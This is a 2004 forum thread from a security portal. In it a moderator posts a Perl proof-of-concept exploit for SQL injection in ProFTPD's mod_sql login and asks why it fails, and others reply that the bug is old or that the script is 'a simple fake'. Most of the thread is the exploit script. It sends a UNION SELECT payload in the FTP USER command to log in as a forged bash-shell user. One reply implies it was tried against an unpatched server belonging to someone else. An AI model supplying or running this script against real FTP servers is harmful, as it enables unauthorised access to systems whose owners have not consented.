  | 
	 | 
	  | 
 
 
    
        
          
              
                
                    
                      
                          
                            
                            
	
	
		  | 
		 | 
	 
	
		  | 
		IT Security and Insecurity Portal | 
	 
	 
	 | 
 
 
 
	  | 
	proftp exploit no work | 
	  | 
 
 
	
	
		 Posted: Fri Aug 20, 2004 7:54 pm | 
		      | 
	   | 
 
	
	
		
		
			
			
				
				| LINUX |  
				| Moderator |  
				 
   |  
				 |  
				| Joined: May 24, 2004 |  
				| Posts: 404 |  
				| Location: Caiman |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			exploit for proftp no work   WHY ???    delete exit no work   
 
 
 
 	  | Code: | 	 		  #!/usr/bin/perl
 
# SQL inject on ProFTPD with mod_sql proof of concept script
 
# runlevel [ runlevel@raregazz.org ]
 
# Spain, 2003
 
 
use IO::Socket;
 
if(@ARGC<2){
 
  print "\nProof Of Concept Sql Inject on ProFTPD\n";
 
  print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
 
  exit(0);
 
};
 
 
$server = $ARGV[0];
 
$query = $ARGV[1];
 
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) 
 
             or die "Can't connect. \n";
 
if(defined($line=<$remote>)){
 
  print STDOUT $line;
 
}
 
 
# Proof of concept query, it may change on the number of rows
 
# By default, it can query User, Pass, Uid, Gid, Shell or
 
# User, Pass, Uid, Gid, Shell, Path, change the union query...
 
 
if($query eq "1"){
 
  print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
 
}else{
 
  print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n";
 
};
 
if(defined($line=<$remote>)){
 
  print STDOUT $line;
 
}
 
print $remote "PASS p\n";
 
if(defined($line=<$remote>)){
 
  print STDOUT $line;
 
}
 
print "Sent query to $ARGV[0]\n";
 
if($line =~ /230/){ #logged in
 
  print "[------- Sql Inject Able \n";
 
}else{
 
  print "[------- Sql Inject Unable \n";
 
}
 
close $remote;
 
 | 	  
 
 
 
more info   http://www.securiteam.com/unixfocus/5LP0E2KAAI.html | 
		 
		  | 
	 
	
		 | 
	 
	  | 
 
	 | 
 
 
  |   
	  | 
	 | 
	  | 
 
 
	
	
		 Posted: Tue Aug 24, 2004 2:38 am | 
		      | 
	   | 
 
	
	
		
		
			
			
				
				| bima |  
				| Regular user |  
				 
   |  
				 |  
				| Joined: Jun 14, 2004 |  
				| Posts: 16 |  
				| Location: dunia fana |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			u see the date of posting ?
 
 
19/6/2003
 
SQL Inject in ProFTPD Login against PostgreSQL Using mod_sql
 
 
that's too old  
 
 
r u sure that u test that script to the right version of proftpd ?
 
 
   | 
		 
		  | 
	 
	
		 | 
	 
	  | 
 
	 | 
 
 
	
	
		 Posted: Tue Aug 31, 2004 6:47 am | 
		      | 
	   | 
 
	
	
		
		
			
			
				
				| LINUX |  
				| Moderator |  
				 
   |  
				 |  
				| Joined: May 24, 2004 |  
				| Posts: 404 |  
				| Location: Caiman |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			yes  this admin  not patch you ftp server         
 
 
 
i | 
		 
		  | 
	 
	
		 | 
	 
	  | 
 
	 | 
 
 
	
	
		 Posted: Mon Apr 18, 2005 5:18 pm | 
		      | 
	   | 
 
	
	
		
		
			
			
				
				| poerschke |  
				| Regular user |  
				 
   |  
				 |  
				| Joined: Apr 18, 2005 |  
				| Posts: 5 |  
				| Location: Brazil |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			a simple fake   | 
		 
		  | 
	 
	
		 | 
	 
	  | 
 
	 | 
 
 
	
	www.waraxe.us Forum Index -> Perl 
	
	
		
			You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum 
		 | 
		
			All times are GMT 
			Page 1 of 1
			 
			
		 | 
	 
	 
	 | 
 
	| 
	 | 
 
 
  
Powered by phpBB © 2001-2008 phpBB Group
 
  
 
 
 | 
                           
                         
                         | 
                     
                    | 
               
              | 
         
       
       |